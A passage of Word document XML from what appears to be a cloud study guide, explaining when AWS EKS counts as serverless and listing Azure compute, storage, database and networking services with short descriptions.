          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Is EKS Serverless?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E54A3" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EKS is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not entirely serverless</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1D1B9" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EKS with EC2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F77E3F" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manage EC2 worker nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (infrastructure) → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NOT serverless</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B32123" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EKS with AWS Fargate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B04EB" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>YES, this is serverless</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC896F8" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don't manage servers or EC2 nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C547BA3" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Just define your pods and Fargate runs them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00180A5D" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So, EKS becomes serverless when integrated with AWS Fargate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355245DC" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5B50B256">
          <v:rect id="_x0000_i3466" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EEBFB" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When to Use EKS with Fargate (Serverless Mode)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBFC23D" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Short-lived workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B97FD" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Small/medium apps needing high isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52D272" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When you want Kubernetes + serverless simplicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383E497" w14:textId="3863B239" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D61854">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="41D67F6F">
          <v:rect id="_x0000_i3467" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BF8E52" w14:textId="77777777" w:rsidR="00C632D7" w:rsidRDefault="00C632D7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35991E29" w14:textId="4D858156" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="855" w:name="_Toc196308335"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Azure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="855"/>
    </w:p>
    <w:p w14:paraId="0508CC76" w14:textId="77777777" w:rsidR="003D11FF" w:rsidRPr="00CE4B95" w:rsidRDefault="003D11FF" w:rsidP="003D11FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFB5A8B" w14:textId="48DBA50C" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="009B352A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="856" w:name="_Toc196308336"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Azure Services</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="856"/>
    </w:p>
    <w:p w14:paraId="149C0938" w14:textId="23F47870" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="005C6EEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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1. Compute Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A643D"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Virtual Machines (VMs):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Run Windows or Linux VMs in the cloud. Fully configurable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C844929"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App Service:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Host web apps, REST APIs, or mobile backends—fully managed platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F76AEE"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Functions (Serverless):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Run event-driven code without managing infrastructure (pay-per-use).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE1FC6"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Kubernetes Service (AKS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Managed Kubernetes service for containerized applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5DDAD" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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00A9360">
          <v:rect id="_x0000_i3468" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735FB27" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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2. Storage Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1080C"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Blob Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Object storage for unstructured data (images, videos, logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE7805"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Disk Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Persistent block storage for Azure VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF327B"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File Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Fully managed file shares accessible via SMB/NFS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A06A47"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Data Lake Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Big data analytics storage, optimized for analytics workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A1E93" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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0C48E48">
          <v:rect id="_x0000_i3469" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5713E61C" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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3. Database Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316FB1FD"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SQL Database:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Managed relational SQL database service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250C0D61"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Cosmos DB:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Globally distributed NoSQL database with multi-region writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A0D3D"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Database for MySQL/PostgreSQL:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Managed open-source databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AD68C" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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F935A24">
          <v:rect id="_x0000_i3470" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655763A" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00584DD9">
      <w:pPr>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4. Networking Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A55FD9"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Virtual Network (VNet):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Create isolated networks in Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5AB3F6"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Load Balancer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Distribute incoming network traffic across VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6E40C"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Application Gateway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Application layer (7) load balancer with SSL termination, WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B57679F"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VPN Gateway &amp; ExpressRoute:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Secure connectivity between on-prem and Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332EE846" w14:textId="77777777" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00000000" w:rsidP="00584DD9">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2F5E5D5">
